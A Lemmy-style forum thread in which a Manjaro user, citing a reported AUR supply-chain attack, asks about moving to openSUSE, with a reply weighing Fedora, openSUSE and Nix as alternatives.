Distrochooser
distrochooser.de
The Distrochooser helps you to find the suitable Linux distribution based on your needs!

With the recent AUR supply-chain attack that compromised over 400 (and possibly up to 1,500) packages, I’m seriously considering switching distros. Attackers took over orphaned packages and modified PKGBUILDs to pull in malicious npm dependencies like atomic-lockfile, which deployed credential-stealing malware and even eBPF rootkits. The fact that the trusted packages themselves didn’t look malicious makes this especially concerning.

Like many Arch users, I’ll admit I don’t carefully read every PKGBUILD before installing from the AUR. The official recommendation has always been to review them manually, but realistically, who does that for every package? This incident made me realize I’ve been relying on trust rather than vigilance.

I’ve been on Manjaro for years specifically because of the AUR’s vastness, but this attack directly undermines that selling point for me. I ran the Distrochooser to see what else is out there, and it strongly recommended openSUSE as my top match: https://distrochooser.de/en/d5b4e0067841/

For those who’ve made the jump from Arch/Manjaro to openSUSE Tumbleweed (or Leap): How was the transition? How does the OBS compare to the AUR in terms of package availability for niche software?

  • KianaTabion@lemmy.today
    2·
    5 days ago

    https://distrochooser.de/en/d5b4e0067841/

    Your results suggest that Fedora is an equally viable alternative.

    Regardless, ask yourself the following question: Do you need the vastness that a repository like the AUR provides?

    • Like, are you sure that the repositories of Fedora and openSUSE Tumbleweed don’t contain the packages that you need?
    • Or…, is it more about liberation? Whatever the future might throw at you, you’re confident that the AUR will provide you. But…, that raises another question: are you even exotic in your software needs to begin with?

    The above (sub)question(s) will (hopefully) help you to make an informed decision. Furthermore, please feel free to discuss them openly in hopes that others might chime in.

    Anyhow, I foresee either one of the following:

    • You actually acknowledge (or come to the revelation) that the repositories of Fedora and/or openSUSE (without going into user repositories[1]) are sufficient for you. Thus, becoming a viable destination.
    • The previous option does not happen, simply because your software needs are not contained within their respective repositories. In that case, I’d seriously consider to adopt nix (as a package manager on whatever distro you go for) or perhaps even NixOS if you want to go all-in. The excellent nixpkgs repository is the only one that puts the AUR to shame. And -more importantly within our current discussion- it’s not a user repository, but instead the official one. And thus comes with all the security bells and whistles you’d expect.

    1. To be clear, the user repository of Fedora and openSUSE don’t fare much better than the AUR. The only solace might be that Arch’s own repository is relatively small compared to theirs and thus there’s less need to search for user repositories. Hence, making it easier to manage what’s installed from user repositories. ↩︎